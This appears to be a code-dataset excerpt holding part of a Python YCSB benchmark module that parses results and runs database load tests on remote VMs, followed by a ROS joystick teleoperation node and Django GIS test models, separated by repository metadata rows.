[UPDATE], 99thPercentileLatency(ms), 7
[UPDATE], Return=0, 2468054
[UPDATE], 0, 398998
[UPDATE], 1, 1015682
[UPDATE], 2, 532078
...
Example input for hdrhistogram datatype:
YCSB Client 0.12.0
Command line: -db com.yahoo.ycsb.db.RedisClient -P /opt/pkb/workloadb
[OVERALL], RunTime(ms), 29770.0
[OVERALL], Throughput(ops/sec), 33590.86328518643
[UPDATE], Operations, 49856.0
[UPDATE], AverageLatency(us), 1478.0115532734276
[UPDATE], MinLatency(us), 312.0
[UPDATE], MaxLatency(us), 24623.0
[UPDATE], 95thPercentileLatency(us), 3501.0
[UPDATE], 99thPercentileLatency(us), 6747.0
[UPDATE], Return=OK, 49856
...
Example input for ycsb version after 0.13.0:
...
Command line: -db com.yahoo.ycsb.db.HBaseClient10 ... -load
YCSB Client 0.14.0
Loading workload...
Starting test.
...
[OVERALL], RunTime(ms), 11411
[OVERALL], Throughput(ops/sec), 8763.473841030585
[INSERT], Operations, 100000
[INSERT], AverageLatency(us), 74.92
[INSERT], MinLatency(us), 5
[INSERT], MaxLatency(us), 98495
[INSERT], 95thPercentileLatency(us), 42
[INSERT], 99thPercentileLatency(us), 1411
[INSERT], Return=OK, 100000
...
Example input for timeseries datatype:
...
[OVERALL], RunTime(ms), 240007.0
[OVERALL], Throughput(ops/sec), 10664.605615669543
...
[READ], Operations, 1279253
[READ], AverageLatency(us), 3002.7057071587874
[READ], MinLatency(us), 63
[READ], MaxLatency(us), 93584
[READ], Return=OK, 1279281
[READ], 0, 528.6142757498257
[READ], 500, 360.95347448674966
[READ], 1000, 667.7379547689283
[READ], 1500, 731.5389357265888
[READ], 2000, 778.7992281717318
...
Args:
ycsb_result_string: str. Text output from YCSB.
data_type: Either 'histogram' or 'timeseries' or 'hdrhistogram'.
'histogram' and 'hdrhistogram' datasets are in the same format, with the
difference being lacking the (millisec, count) histogram component. Hence
are parsed similarly.
Returns:
A dictionary with keys:
client: containing YCSB version information.
command_line: Command line executed.
groups: list of operation group descriptions, each with schema:
group: group name (e.g., update, insert, overall)
statistics: dict mapping from statistic name to value
histogram: list of (ms_lower_bound, count) tuples, e.g.:
[(0, 530), (19, 1)]
indicates that 530 ops took between 0ms and 1ms, and 1 took between
19ms and 20ms. Empty bins are not reported.
Raises:
IOError: If the results contained unexpected lines.
"""
# TODO: YCSB 0.9.0 output client and command line string to stderr, so
# we need to support it in the future.
lines = []
client_string = 'YCSB'
command_line = 'unknown'
fp = six.StringIO(ycsb_result_string)
result_string = next(fp).strip()
def IsHeadOfResults(line):
return line.startswith('[OVERALL]')
while not IsHeadOfResults(result_string):
if result_string.startswith('YCSB Client 0.'):
client_string = result_string
if result_string.startswith('Command line:'):
command_line = result_string
try:
result_string = next(fp).strip()
except StopIteration:
raise IOError(
'Could not parse YCSB output: {}'.format(ycsb_result_string))
if result_string.startswith('[OVERALL]'): # YCSB > 0.7.0.
lines.append(result_string)
else:
# Received unexpected header
raise IOError('Unexpected header: {0}'.format(client_string))
# Some databases print additional output to stdout.
# YCSB results start with [<OPERATION_NAME>];
# filter to just those lines.
def LineFilter(line):
return re.search(r'^\[[A-Z]+\]', line) is not None
lines = itertools.chain(lines, filter(LineFilter, fp))
r = csv.reader(lines)
by_operation = itertools.groupby(r, operator.itemgetter(0))
result = collections.OrderedDict([
('client', client_string),
('command_line', command_line),
('groups', collections.OrderedDict())])
for operation, lines in by_operation:
operation = operation[1:-1].lower()
if operation == 'cleanup':
continue
op_result = {
'group': operation,
data_type: [],
'statistics': {}
}
latency_unit = 'ms'
for _, name, val in lines:
name = name.strip()
val = val.strip()
# Drop ">" from ">1000"
if name.startswith('>'):
name = name[1:]
val = float(val) if '.' in val or 'nan' in val.lower() else int(val)
if name.isdigit():
if val:
if data_type == TIMESERIES and latency_unit == 'us':
val /= 1000.0
op_result[data_type].append((int(name), val))
else:
if '(us)' in name:
name = name.replace('(us)', '(ms)')
val /= 1000.0
latency_unit = 'us'
op_result['statistics'][name] = val
result['groups'][operation] = op_result
return result
def ParseHdrLogFile(logfile):
"""Parse a hdrhistogram log file into a list of (percentile, latency, count).
Example decrypted hdrhistogram logfile (value measures latency in microsec):
#[StartTime: 1523565997 (seconds since epoch), Thu Apr 12 20:46:37 UTC 2018]
Value Percentile TotalCount 1/(1-Percentile)
314.000 0.000000000000 2 1.00
853.000 0.100000000000 49955 1.11
949.000 0.200000000000 100351 1.25
1033.000 0.300000000000 150110 1.43
...
134271.000 0.999998664856 1000008 748982.86
134271.000 0.999998855591 1000008 873813.33
201983.000 0.999999046326 1000009 1048576.00
#[Mean = 1287.159, StdDeviation = 667.560]
#[Max = 201983.000, Total count = 1000009]
#[Buckets = 8, SubBuckets = 2048]
Example of output:
[(0, 0.314, 2), (10, 0.853, 49953), (20, 0.949, 50396), ...]
Args:
logfile: Hdrhistogram log file.
Returns:
List of (percent, value, count) tuples
"""
result = []
last_percent_value = -1
prev_total_count = 0
for row in logfile.split('\n'):
if re.match(r'( *)(\d|\.)( *)', row):
row_vals = row.split()
# convert percentile to 100 based and round up to 3 decimal places
percentile = math.floor(float(row_vals[1]) * 100000) / 1000.0
current_total_count = int(row_vals[2])
if (percentile > last_percent_value and
current_total_count > prev_total_count):
# convert latency to millisec based and percentile to 100 based.
latency = float(row_vals[0]) / 1000
count = current_total_count - prev_total_count
result.append((percentile, latency, count))
last_percent_value = percentile
prev_total_count = current_total_count
return result
def ParseHdrLogs(hdrlogs):
"""Parse a dict of group to hdr logs into a dict of group to histogram tuples.
Args:
hdrlogs: Dict of group (read or update) to hdr logs for that group.
Returns:
Dict of group to histogram tuples of reportable percentile values.
"""
parsed_hdr_histograms = {}
for group, logfile in six.iteritems(hdrlogs):
values = ParseHdrLogFile(logfile)
parsed_hdr_histograms[group] = values
return parsed_hdr_histograms
def _CumulativeSum(xs):
total = 0
for x in xs:
total += x
yield total
def _WeightedQuantile(x, weights, p):
"""Weighted quantile measurement for an ordered list.
This method interpolates to the higher value when the quantile is not a direct
member of the list. This works well for YCSB, since latencies are floored.
Args:
x: List of values.
weights: List of numeric weights.
p: float. Desired quantile in the interval [0, 1].
Returns:
float.
Raises:
ValueError: When 'x' and 'weights' are not the same length, or 'p' is not in
the interval [0, 1].
"""
if len(x) != len(weights):
raise ValueError('Lengths do not match: {0} != {1}'.format(
len(x), len(weights)))
if p < 0 or p > 1:
raise ValueError('Invalid quantile: {0}'.format(p))
n = sum(weights)
target = n * float(p)
cumulative = list(_CumulativeSum(weights))
# Find the first cumulative weight >= target
i = bisect.bisect_left(cumulative, target)
if i == len(x):
return x[-1]
else:
return x[i]
def _PercentilesFromHistogram(ycsb_histogram, percentiles=_DEFAULT_PERCENTILES):
"""Calculate percentiles for from a YCSB histogram.
Args:
ycsb_histogram: List of (time_ms, frequency) tuples.
percentiles: iterable of floats, in the interval [0, 100].
Returns:
dict, mapping from percentile to value.
Raises:
ValueError: If one or more percentiles are outside [0, 100].
"""
result = collections.OrderedDict()
histogram = sorted(ycsb_histogram)
for percentile in percentiles:
if percentile < 0 or percentile > 100:
raise ValueError('Invalid percentile: {0}'.format(percentile))
if math.modf(percentile)[0] < 1e-7:
percentile = int(percentile)
label = 'p{0}'.format(percentile)
latencies, freqs = list(zip(*histogram))
time_ms = _WeightedQuantile(latencies, freqs, percentile * 0.01)
result[label] = time_ms
return result
def _CombineResults(result_list, measurement_type, combined_hdr):
"""Combine results from multiple YCSB clients.
Reduces a list of YCSB results (the output of ParseResults)
into a single result. Histogram bin counts, operation counts, and throughput
are summed; RunTime is replaced by the maximum runtime of any result.
Args:
result_list: List of ParseResults outputs.
measurement_type: Measurement type used. If measurement type is histogram,
histogram bins are summed across results. If measurement type is
hdrhistogram, an aggregated hdrhistogram (combined_hdr) is expected.
combined_hdr: Dict of already aggregated histogram.
Returns:
A dictionary, as returned by ParseResults.
"""
def DropUnaggregated(result):
"""Remove statistics which 'operators' specify should not be combined."""
drop_keys = {k for k, v in six.iteritems(AGGREGATE_OPERATORS) if v is None}
for group in six.itervalues(result['groups']):
for k in drop_keys:
group['statistics'].pop(k, None)
def CombineHistograms(hist1, hist2):
h1 = dict(hist1)
h2 = dict(hist2)
keys = sorted(frozenset(h1) | frozenset(h2))
result = []
for k in keys:
result.append((k, h1.get(k, 0) + h2.get(k, 0)))
return result
def CombineTimeseries(combined_series, individual_series, combined_weight):
"""Combines two timeseries of average latencies.
Args:
combined_series: A list representing the timeseries with which the
individual series is being merged.
individual_series: A list representing the timeseries being merged with
the combined series.
combined_weight: The number of individual series that the combined series
represents. This is needed to correctly weight the average latencies.
Returns:
A list representing the new combined series.
Note that this assumes that each individual timeseries spent an equal
amount of time executing requests for each timeslice. This should hold for
runs without -target where each client has an equal number of threads, but
may not hold otherwise.
"""
combined_series = dict(combined_series)
individual_series = dict(individual_series)
result = []
for timestamp in sorted(combined_series):
if timestamp not in individual_series:
# The combined timeseries will not contain a timestamp unless all
# individual series also contain that timestamp. This should only
# happen if the clients run for different amounts of time such as
# during loading and should be limited to timestamps at the end of the
# run.
continue
# This computes a new combined average latency by dividing the sum of
# request latencies by the sum of request counts for the time period.
# The sum of latencies for an individual series is assumed to be "1",
# so the sum of latencies for the combined series is the total number of
# series i.e. "combined_weight".
# The request count for an individual series is 1 / average latency.
# This means the request count for the combined series is
# combined_weight * 1 / average latency.
average_latency = (combined_weight + 1.0) / (
(combined_weight / combined_series[timestamp]) +
(1.0 / individual_series[timestamp]))
result.append((timestamp, average_latency))
return result
result = copy.deepcopy(result_list[0])
DropUnaggregated(result)
# Used for aggregating timeseries. See CombineTimeseries().
series_weight = 0.0
for indiv in result_list[1:]:
series_weight += 1.0
for group_name, group in six.iteritems(indiv['groups']):
if group_name not in result['groups']:
logging.warn('Found result group "%s" in individual YCSB result, '
'but not in accumulator.', group_name)
result['groups'][group_name] = copy.deepcopy(group)
continue
# Combine reported statistics.
# If no combining operator is defined, the statistic is skipped.
# Otherwise, the aggregated value is either:
# * The value in 'indiv', if the statistic is not present in 'result' or
# * AGGREGATE_OPERATORS[statistic](result_value, indiv_value)
for k, v in six.iteritems(group['statistics']):
if k not in AGGREGATE_OPERATORS:
logging.warn('No operator for "%s". Skipping aggregation.', k)
continue
elif AGGREGATE_OPERATORS[k] is None: # Drop
result['groups'][group_name]['statistics'].pop(k, None)
continue
elif k not in result['groups'][group_name]['statistics']:
logging.warn('Found statistic "%s.%s" in individual YCSB result, '
'but not in accumulator.', group_name, k)
result['groups'][group_name]['statistics'][k] = copy.deepcopy(v)
continue
op = AGGREGATE_OPERATORS[k]
result['groups'][group_name]['statistics'][k] = (
op(result['groups'][group_name]['statistics'][k], v))
if measurement_type == HISTOGRAM:
result['groups'][group_name][HISTOGRAM] = CombineHistograms(
result['groups'][group_name][HISTOGRAM],
group[HISTOGRAM])
elif measurement_type == TIMESERIES:
result['groups'][group_name][TIMESERIES] = CombineTimeseries(
result['groups'][group_name][TIMESERIES],
group[TIMESERIES], series_weight)
else:
result['groups'][group_name].pop(HISTOGRAM, None)
result['client'] = ' '.join((result['client'], indiv['client']))
result['command_line'] = ';'.join((result['command_line'],
indiv['command_line']))
if 'target' in result and 'target' in indiv:
result['target'] += indiv['target']
if measurement_type == HDRHISTOGRAM:
for group_name in combined_hdr:
if group_name in result['groups']:
result['groups'][group_name][HDRHISTOGRAM] = combined_hdr[group_name]
return result
def _ParseWorkload(contents):
"""Parse a YCSB workload file.
YCSB workloads are Java .properties format.
http://en.wikipedia.org/wiki/.properties
This function does not support all .properties syntax, in particular escaped
newlines.
Args:
contents: str. Contents of the file.
Returns:
dict mapping from property key to property value for each property found in
'contents'.
"""
fp = six.StringIO(contents)
result = {}
for line in fp:
if (line.strip() and not line.lstrip().startswith('#') and
not line.lstrip().startswith('!')):
k, v = re.split(r'\s*[:=]\s*', line, maxsplit=1)
result[k] = v.strip()
return result
def _CreateSamples(ycsb_result, include_histogram=False, **kwargs):
"""Create PKB samples from a YCSB result.
Args:
ycsb_result: dict. Result of ParseResults.
include_histogram: bool. If True, include records for each histogram bin.
Note that this will increase the output volume significantly.
**kwargs: Base metadata for each sample.
Yields:
List of sample.Sample objects.
"""
stage = 'load' if ycsb_result['command_line'].endswith('-load') else 'run'
base_metadata = {'command_line': ycsb_result['command_line'],
'stage': stage,
'ycsb_version': FLAGS.ycsb_version}
base_metadata.update(kwargs)
for group_name, group in six.iteritems(ycsb_result['groups']):
meta = base_metadata.copy()
meta['operation'] = group_name
for statistic, value in six.iteritems(group['statistics']):
if value is None:
continue
unit = ''
m = re.match(r'^(.*) *\((us|ms|ops/sec)\)$', statistic)
if m:
statistic = m.group(1)
unit = m.group(2)
yield sample.Sample(' '.join([group_name, statistic]), value, unit, meta)
if group.get(HISTOGRAM, []):
percentiles = _PercentilesFromHistogram(group[HISTOGRAM])
for label, value in six.iteritems(percentiles):
yield sample.Sample(' '.join([group_name, label, 'latency']),
value, 'ms', meta)
if include_histogram:
for time_ms, count in group[HISTOGRAM]:
yield sample.Sample(
'{0}_latency_histogram_{1}_ms'.format(group_name, time_ms),
count, 'count', meta)
if group.get(HDRHISTOGRAM, []):
# Strip percentile from the three-element tuples.
histogram = [value_count[-2:] for value_count in group[HDRHISTOGRAM]]
percentiles = _PercentilesFromHistogram(histogram)
for label, value in six.iteritems(percentiles):
yield sample.Sample(' '.join([group_name, label, 'latency']),
value, 'ms', meta)
if include_histogram:
histogram = []
for _, value, bucket_count in group[HDRHISTOGRAM]:
histogram.append({'microsec_latency': int(value * 1000),
'count': bucket_count})
hist_meta = meta.copy()
hist_meta.update({'histogram': json.dumps(histogram)})
yield sample.Sample('{0} latency histogram'.format(group_name),
0, '', hist_meta)
if group.get(TIMESERIES):
for sample_time, average_latency in group[TIMESERIES]:
timeseries_meta = meta.copy()
timeseries_meta['sample_time'] = sample_time
yield sample.Sample(' '.join([group_name,
'AverageLatency (timeseries)']),
average_latency, 'ms', timeseries_meta)
class YCSBExecutor(object):
"""Load data and run benchmarks using YCSB.
See core/src/main/java/com/yahoo/ycsb/workloads/CoreWorkload.java for
attribute descriptions.
Attributes:
database: str.
loaded: boolean. If the database is already loaded.
parameters: dict. May contain the following, plus database-specific fields
(e.g., columnfamily for HBase).
threads: int.
target: int.
fieldcount: int.
fieldlengthdistribution: str.
readallfields: boolean.
writeallfields: boolean.
readproportion: float.
updateproportion: float.
scanproportion: float.
readmodifywriteproportion: float.
requestdistribution: str.
maxscanlength: int. Number of records to scan.
scanlengthdistribution: str.
insertorder: str.
hotspotdatafraction: float.
perclientparam: list.
shardkeyspace: boolean. Default to False, indicates if clients should
have their own keyspace.
"""
FLAG_ATTRIBUTES = 'cp', 'jvm-args', 'target', 'threads'
def __init__(self, database, parameter_files=None, **kwargs):
self.database = database
self.loaded = False
self.measurement_type = FLAGS.ycsb_measurement_type
self.hdr_dir = HDRHISTOGRAM_DIR
self.parameter_files = parameter_files or []
self.parameters = kwargs.copy()
self.parameters['measurementtype'] = self.measurement_type
self.parameters['measurement.interval'] = FLAGS.ycsb_measurement_interval
# Self-defined parameters, pop them out of self.parameters, so they
# are not passed to ycsb commands
self.perclientparam = self.parameters.pop('perclientparam', None)
self.shardkeyspace = self.parameters.pop('shardkeyspace', False)
def _BuildCommand(self, command_name, parameter_files=None, **kwargs):
"""Builds the YCSB command line."""
command = [YCSB_EXE, command_name, self.database]
parameters = self.parameters.copy()
parameters.update(kwargs)
# These are passed as flags rather than properties, so they
# are handled differently.
for flag in self.FLAG_ATTRIBUTES:
value = parameters.pop(flag, None)
if value is not None:
command.extend(('-{0}'.format(flag), str(value)))
for param_file in list(self.parameter_files) + list(parameter_files or []):
command.extend(('-P', param_file))
for parameter, value in six.iteritems(parameters):
command.extend(('-p', '{0}={1}'.format(parameter, value)))
return 'cd %s; %s' % (YCSB_DIR, ' '.join(command))
@property
def _default_preload_threads(self):
"""The default number of threads to use for pre-populating the DB."""
if FLAGS['ycsb_preload_threads'].present:
return FLAGS.ycsb_preload_threads
return DEFAULT_PRELOAD_THREADS
def _Load(self, vm, **kwargs):
"""Execute 'ycsb load' on 'vm'."""
kwargs.setdefault('threads', self._default_preload_threads)
if FLAGS.ycsb_record_count:
kwargs.setdefault('recordcount', FLAGS.ycsb_record_count)
for pv in FLAGS.ycsb_load_parameters:
param, value = pv.split('=', 1)
kwargs[param] = value
command = self._BuildCommand('load', **kwargs)
stdout, stderr = vm.RobustRemoteCommand(command)
return ParseResults(str(stderr + stdout), self.measurement_type)
def _LoadThreaded(self, vms, workload_file, **kwargs):
"""Runs "Load" in parallel for each VM in VMs.
Args:
vms: List of virtual machine instances. client nodes.
workload_file: YCSB Workload file to use.
**kwargs: Additional key-value parameters to pass to YCSB.
Returns:
List of sample.Sample objects.
Raises:
IOError: If number of results is not equal to the number of VMs.
"""
results = []
remote_path = posixpath.join(INSTALL_DIR,
os.path.basename(workload_file))
kwargs.setdefault('threads', self._default_preload_threads)
if FLAGS.ycsb_record_count:
kwargs.setdefault('recordcount', FLAGS.ycsb_record_count)
if FLAGS.ycsb_field_count:
kwargs.setdefault('fieldcount', FLAGS.ycsb_field_count)
if FLAGS.ycsb_field_length:
kwargs.setdefault('fieldlength', FLAGS.ycsb_field_length)
with open(workload_file) as fp:
workload_meta = _ParseWorkload(fp.read())
workload_meta.update(kwargs)
workload_meta.update(stage='load',
clients=len(vms) * kwargs['threads'],
threads_per_client_vm=kwargs['threads'],
workload_name=os.path.basename(workload_file))
self.workload_meta = workload_meta
record_count = int(workload_meta.get('recordcount', '1000'))
n_per_client = int(record_count) // len(vms)
loader_counts = [
n_per_client + (1 if i < (record_count % len(vms)) else 0)
for i in range(len(vms))
]
def PushWorkload(vm):
vm.PushFile(workload_file, remote_path)
vm_util.RunThreaded(PushWorkload, list(set(vms)))
kwargs['parameter_files'] = [remote_path]
def _Load(loader_index):
start = sum(loader_counts[:loader_index])
kw = copy.deepcopy(kwargs)
kw.update(insertstart=start,
insertcount=loader_counts[loader_index])
if self.perclientparam is not None:
kw.update(self.perclientparam[loader_index])
results.append(self._Load(vms[loader_index], **kw))
logging.info('VM %d (%s) finished', loader_index, vms[loader_index])
start = time.time()
vm_util.RunThreaded(_Load, list(range(len(vms))))
events.record_event.send(
type(self).__name__, event='load', start_timestamp=start,
end_timestamp=time.time(), metadata=copy.deepcopy(kwargs))
if len(results) != len(vms):
raise IOError('Missing results: only {0}/{1} reported\n{2}'.format(
len(results), len(vms), results))
samples = []
if FLAGS.ycsb_include_individual_results and len(results) > 1:
for i, result in enumerate(results):
samples.extend(_CreateSamples(
result, result_type='individual', result_index=i,
include_histogram=FLAGS.ycsb_histogram,
**workload_meta))
# hdr histograms not collected upon load, only upon run
combined = _CombineResults(results, self.measurement_type, {})
samples.extend(_CreateSamples(
combined, result_type='combined',
include_histogram=FLAGS.ycsb_histogram,
**workload_meta))
return samples
def _Run(self, vm, **kwargs):
"""Run a single workload from a client vm."""
for pv in FLAGS.ycsb_run_parameters:
param, value = pv.split('=', 1)
kwargs[param] = value
command = self._BuildCommand('run', **kwargs)
# YCSB version greater than 0.7.0 output some of the
# info we need to stderr. So we have to combine these 2
# output to get expected results.
hdr_files_dir = kwargs.get('hdrhistogram.output.path', None)
if hdr_files_dir:
vm.RemoteCommand('mkdir -p {0}'.format(hdr_files_dir))
stdout, stderr = vm.RobustRemoteCommand(command)
return ParseResults(str(stderr + stdout), self.measurement_type)
def _RunThreaded(self, vms, **kwargs):
"""Run a single workload using `vms`."""
target = kwargs.pop('target', None)
if target is not None:
target_per_client = target // len(vms)
targets = [
target_per_client + (1 if i < (target % len(vms)) else 0)
for i in range(len(vms))
]
else:
targets = [target for _ in vms]
results = []
if self.shardkeyspace:
record_count = int(self.workload_meta.get('recordcount', '1000'))
n_per_client = int(record_count) // len(vms)
loader_counts = [
n_per_client + (1 if i < (record_count % len(vms)) else 0)
for i in range(len(vms))
]
def _Run(loader_index):
"""Run YCSB on an individual VM."""
vm = vms[loader_index]
params = copy.deepcopy(kwargs)
params['target'] = targets[loader_index]
if self.perclientparam is not None:
params.update(self.perclientparam[loader_index])
if self.shardkeyspace:
start = sum(loader_counts[:loader_index])
end = start + loader_counts[loader_index]
params.update(insertstart=start,
recordcount=end)
results.append(self._Run(vm, **params))
logging.info('VM %d (%s) finished', loader_index, vm)
vm_util.RunThreaded(_Run, list(range(len(vms))))
if len(results) != len(vms):
raise IOError('Missing results: only {0}/{1} reported\n{2}'.format(
len(results), len(vms), results))
return results
def RunStaircaseLoads(self, vms, workloads, **kwargs):
"""Run each workload in 'workloads' in succession.
A staircase load is applied for each workload file, for each entry in
ycsb_threads_per_client.
Args:
vms: List of VirtualMachine objects to generate load from.
workloads: List of workload file names.
**kwargs: Additional parameters to pass to each run. See constructor for
options.
Returns:
List of sample.Sample objects.
"""
all_results = []
parameters = {}
for workload_index, workload_file in enumerate(workloads):
if FLAGS.ycsb_operation_count:
parameters = {'operationcount': FLAGS.ycsb_operation_count}
if FLAGS.ycsb_record_count:
parameters['recordcount'] = FLAGS.ycsb_record_count
if FLAGS.ycsb_field_count:
parameters['fieldcount'] = FLAGS.ycsb_field_count
if FLAGS.ycsb_field_length:
parameters['fieldlength'] = FLAGS.ycsb_field_length
if FLAGS.ycsb_timelimit:
parameters['maxexecutiontime'] = FLAGS.ycsb_timelimit
hdr_files_dir = posixpath.join(self.hdr_dir, str(workload_index))
if FLAGS.ycsb_measurement_type == HDRHISTOGRAM:
parameters['hdrhistogram.fileoutput'] = True
parameters['hdrhistogram.output.path'] = hdr_files_dir
if FLAGS.ycsb_requestdistribution:
parameters['requestdistribution'] = FLAGS.ycsb_requestdistribution
if FLAGS.ycsb_readproportion:
parameters['readproportion'] = FLAGS.ycsb_readproportion
if FLAGS.ycsb_updateproportion:
parameters['updateproportion'] = FLAGS.ycsb_updateproportion
if FLAGS.ycsb_scanproportion:
parameters['scanproportion'] = FLAGS.ycsb_scanproportion
parameters.update(kwargs)
remote_path = posixpath.join(INSTALL_DIR,
os.path.basename(workload_file))
with open(workload_file) as fp:
workload_meta = _ParseWorkload(fp.read())
workload_meta.update(kwargs)
workload_meta.update(workload_name=os.path.basename(workload_file),
workload_index=workload_index,
stage='run')
def PushWorkload(vm, workload_file, remote_path):
vm.RemoteCommand('sudo rm -f ' + remote_path)
vm.PushFile(workload_file, remote_path)
vm_util.RunThreaded(PushWorkload, [((vm, workload_file, remote_path), {})
for vm in dict.fromkeys(vms)])
parameters['parameter_files'] = [remote_path]
for client_count in _GetThreadsPerLoaderList():
parameters['threads'] = client_count
start = time.time()
results = self._RunThreaded(vms, **parameters)
events.record_event.send(
type(self).__name__, event='run', start_timestamp=start,
end_timestamp=time.time(), metadata=copy.deepcopy(parameters))
client_meta = workload_meta.copy()
client_meta.update(parameters)
client_meta.update(clients=len(vms) * client_count,
threads_per_client_vm=client_count)
if FLAGS.ycsb_include_individual_results and len(results) > 1:
for i, result in enumerate(results):
all_results.extend(_CreateSamples(
result,
result_type='individual',
result_index=i,
include_histogram=FLAGS.ycsb_histogram,
**client_meta))
if self.measurement_type == HDRHISTOGRAM:
combined_log = self.CombineHdrHistogramLogFiles(hdr_files_dir, vms)
parsed_hdr = ParseHdrLogs(combined_log)
combined = _CombineResults(results, self.measurement_type, parsed_hdr)
else:
combined = _CombineResults(results, self.measurement_type, {})
all_results.extend(_CreateSamples(
combined, result_type='combined',
include_histogram=FLAGS.ycsb_histogram,
**client_meta))
return all_results
def CombineHdrHistogramLogFiles(self, hdr_files_dir, vms):
"""Combine multiple hdr histograms by group type.
Combine multiple hdr histograms in hdr log files format into 1 human
readable hdr histogram log file.
This is done by
1) copying hdrhistogram log files to a single file on a worker vm;
2) aggregating file containing multiple %-tile histogram into
a single %-tile histogram using HistogramLogProcessor from the
hdrhistogram package that is installed on the vms. Refer to https://
github.com/HdrHistogram/HdrHistogram/blob/master/HistogramLogProcessor
Args:
hdr_files_dir: directory on the remote vms where hdr files are stored.
vms: remote vms
Returns:
dict of hdrhistograms keyed by group type
"""
hdrhistograms = {}
for grouptype in HDRHISTOGRAM_GROUPS:
worker_vm = vms[0]
for vm in vms[1:]:
hdr, _ = vm.RemoteCommand(
'tail -1 {0}{1}.hdr'.format(hdr_files_dir, grouptype))
worker_vm.RemoteCommand(
'sudo chmod 777 {1}{2}.hdr && echo "{0}" >> {1}{2}.hdr'.format(
hdr[:-1], hdr_files_dir, grouptype))
hdrhistogram, _ = worker_vm.RemoteCommand(
'cd {0}; ./HistogramLogProcessor -i {1}{2}.hdr -outputValueUnitRatio '
'1'.format(self.hdr_dir, hdr_files_dir, grouptype))
hdrhistograms[grouptype.lower()] = hdrhistogram
return hdrhistograms
def Load(self, vms, workloads=None, load_kwargs=None):
"""Load data using YCSB."""
workloads = workloads or _GetWorkloadFileList()
load_samples = []
assert workloads, 'no workloads'
if FLAGS.ycsb_reload_database or not self.loaded:
load_samples += list(self._LoadThreaded(
vms, workloads[0], **(load_kwargs or {})))
self.loaded = True
if FLAGS.ycsb_load_samples:
return load_samples
else:
return []
def Run(self, vms, workloads=None, run_kwargs=None):
"""Runs each workload/client count combination."""
workloads = workloads or _GetWorkloadFileList()
assert workloads, 'no workloads'
return list(self.RunStaircaseLoads(vms, workloads,
**(run_kwargs or {})))
def LoadAndRun(self, vms, workloads=None, load_kwargs=None, run_kwargs=None):
"""Load data using YCSB, then run each workload/client count combination.
Loads data using the workload defined by 'workloads', then
executes YCSB for each workload file in 'workloads', for each
client count defined in FLAGS.ycsb_threads_per_client.
Generally database benchmarks using YCSB should only need to call this
method.
Args:
vms: List of virtual machines. VMs to use to generate load.
workloads: List of strings. Workload files to use. If unspecified,
_GetWorkloadFileList() is used.
load_kwargs: dict. Additional arguments to pass to the load stage.
run_kwargs: dict. Additional arguments to pass to the run stage.
Returns:
List of sample.Sample objects.
"""
load_samples = self.Load(vms, workloads=workloads, load_kwargs=load_kwargs)
run_samples = self.Run(vms, workloads=workloads, run_kwargs=run_kwargs)
return load_samples + run_samples
| 38.011804
| 99
| 0.663613
|
8a17f493b4631892182bfd29f2c5464d100983cb
| 1,509
|
py
|
Python
|
RasPi_Dev/ros_ws/src/xtark_driver/scripts/joy_teleop.py
|
QianheYu/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | 1
|
2022-03-11T03:31:15.000Z
|
2022-03-11T03:31:15.000Z
|
RasPi_Dev/ros_ws/src/xtark_driver/scripts/joy_teleop.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
RasPi_Dev/ros_ws/src/xtark_driver/scripts/joy_teleop.py
|
bravetree/xtark_driver_dev
|
1708888161cf20c0d1f45c99d0da4467d69c26c8
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
import importlib
import rospy
from sensor_msgs.msg import Joy
import time
from geometry_msgs.msg import Twist, Vector3
from std_msgs.msg import String as StringMsg
class JoyTeleop:
def __init__(self):
self.x_speed_scale = rospy.get_param('~x_speed_scale')
self.y_speed_scale = rospy.get_param('~y_speed_scale')
self.w_speed_scale = rospy.get_param('~w_speed_scale')
self.velocity = Twist()
self.rate = rospy.Rate(20)
self.active = 0
self.cmdVelPublisher = rospy.Publisher('/cmd_vel', Twist, queue_size = 3)
self.joySubscriber = rospy.Subscriber('joy', Joy, self.buttonCallback)
self.loop()
def buttonCallback(self, joy_data):
if(joy_data.buttons[4] == 1):
self.velocity.linear.x = self.x_speed_scale * joy_data.axes[4]
self.velocity.linear.y = self.y_speed_scale * joy_data.axes[3]
self.velocity.angular.z = self.w_speed_scale * joy_data.axes[0]
self.active = 1
else:
self.velocity.linear = Vector3(0.,0.,0.)
self.velocity.angular = Vector3(0.,0.,0.)
self.active = 0
self.cmdVelPublisher.publish(self.velocity)
def loop(self):
while not rospy.is_shutdown():
if(self.active == 1):
self.cmdVelPublisher.publish(self.velocity)
self.rate.sleep()
if __name__ == '__main__':
rospy.init_node('joy_teleop')
joy = JoyTeleop()
try:
rospy.spin()
except rospy.ROSInterruptException:
print('exception')
| 29.019231
| 75
| 0.669317
|
5e773bc627c9b04f6739a39c1d6e2198318f3a9d
| 1,735
|
py
|
Python
|
django/contrib/gis/tests/relatedapp/models.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | 3
|
2016-07-08T23:49:32.000Z
|
2018-04-15T22:55:01.000Z
|
django/contrib/gis/tests/relatedapp/models.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | 27
|
2017-02-05T15:57:04.000Z
|
2018-04-15T22:57:26.000Z
|
django/contrib/gis/tests/relatedapp/models.py
|
egenerat/gae-django
|
f12379483cf3917ed3cb46ca5ff0b94daf89fc50
|
[
"MIT"
] | null | null | null |
from django.contrib.gis.db import models
from django.contrib.localflavor.us.models import USStateField
class Location(models.Model):
point = models.PointField()
objects = models.GeoManager()
def __unicode__(self): return self.point.wkt
class City(models.Model):
name = models.CharField(max_length=50)
state = USStateField()
location = models.ForeignKey(Location)
objects = models.GeoManager()
def __unicode__(self): return self.name
class AugmentedLocation(Location):
extra_text = models.TextField(blank=True)
objects = models.GeoManager()
class DirectoryEntry(models.Model):
listing_text = models.CharField(max_length=50)
location = models.ForeignKey(AugmentedLocation)
objects = models.GeoManager()
class Parcel(models.Model):
name = models.CharField(max_length=30)
city = models.ForeignKey(City)
center1 = models.PointField()
# Throwing a curveball w/`db_column` here.
center2 = models.PointField(srid=2276, db_column='mycenter')
border1 = models.PolygonField()
border2 = models.PolygonField(srid=2276)
objects = models.GeoManager()
def __unicode__(self): return self.name
